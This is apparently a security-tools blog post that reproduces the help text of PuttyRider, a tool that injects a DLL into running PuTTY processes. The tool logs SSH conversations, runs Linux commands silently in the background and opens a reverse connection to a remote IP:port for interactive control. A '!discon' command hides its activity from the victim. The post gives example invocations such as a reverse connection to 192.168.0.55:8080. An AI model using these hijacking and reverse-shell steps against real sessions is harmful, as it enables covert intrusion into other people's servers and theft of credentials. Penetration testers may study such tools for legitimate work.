PuttyRider - Tool To Hijack Putty Sessions
PuttyRider is an open source tool to hijack Putty sessions in order to sniff conversation and inject Linux commands.
Compiling:
Use Visual Studio Command Prompt:nmake main dll
Usage:
Operation modes:
-l List the running Putty processes and their connections
-w Inject in all existing Putty sessions and wait for new sessions
to inject in those also
-p PID Inject only in existing Putty session identified by PID.
If PID==0, inject in the first Putty found
-x Cleanup. Remove the DLL from all running Putty instances
-d Debug mode. Only works with -p mode
-c CMD Automatically execute a Linux command after successful injection
PuttyRider will remove trailing spaces and '&' character from CMD
PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD
-h Print this help
Output modes:
-f Write all Putty conversation to a file in the local directory.
The filename will have the PID of current putty.exe appended
-r IP:PORT Initiate a reverse connection to the specified machine and
start an interactive session.
Interactive commands (after you receive a reverse connection):
!status See if the Putty window is connected to user input
!discon Disconnect the main Putty window so it won't display anything
This is useful to send commands without the user to notice
!recon Reconnect the Putty window to its normal operation mode
CMD Linux shell commands
!exit Terminate this connection
!help Display help for client connection
Examples:
- List existing Putty processes and their status (injected / not injected)
PuttyRider.exe -l
- Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
- Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.
PuttyRider.exe -w -f
- Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)
PuttyRider.exe -x
You might also like:
- Vega - Web Application Security Scanner
- Nessus - An Advanced Vulnerability Scanner
- Resolver - A Reverse DNS Lookup Tool
- Arachni - Web Application Security Scanner Framework
- Sanewall - A Firewall Builder For Linux
- Santoku - A Linux Distro For Mobile Security, Malware Analysis, and Forensics
- SpiderFoot - An Open Source Intelligence Automation Tool
- PacketFence - An Open Source Network Access Control System
- Suricata - An Open Source IDS / IPS / NSM engine
- Malwasm - Tool For Malware Reverse Engineers
- Ghost Phisher - Tool For Phishing and Penetration Attacks
- Evil FOCA - An Open-source Penetration Testing Tool
- Viproy - VoIP Penetration Testing & Exploitation Kit
- Panoptic - Tool For Exploiting Path Traversal Vulnerabilities
- REMnux - A Linux Toolkit For Reverse-Engineering & Malware Analysis
- Canari Framework - A Transform Development Framework For Maltego
- Cuckoo Sandbox - An Open Source Automated Malware Analysis System
- Android Data Extractor Lite - An Open Source Forensic Tool For Android
- Enhanced Mitigation Experience Toolkit (EMET) - An Anti-Exploitation Tool
- Brakeman - A Static Analysis Security Vulnerability Scanner For Ruby on Rails Applications
Post a Comment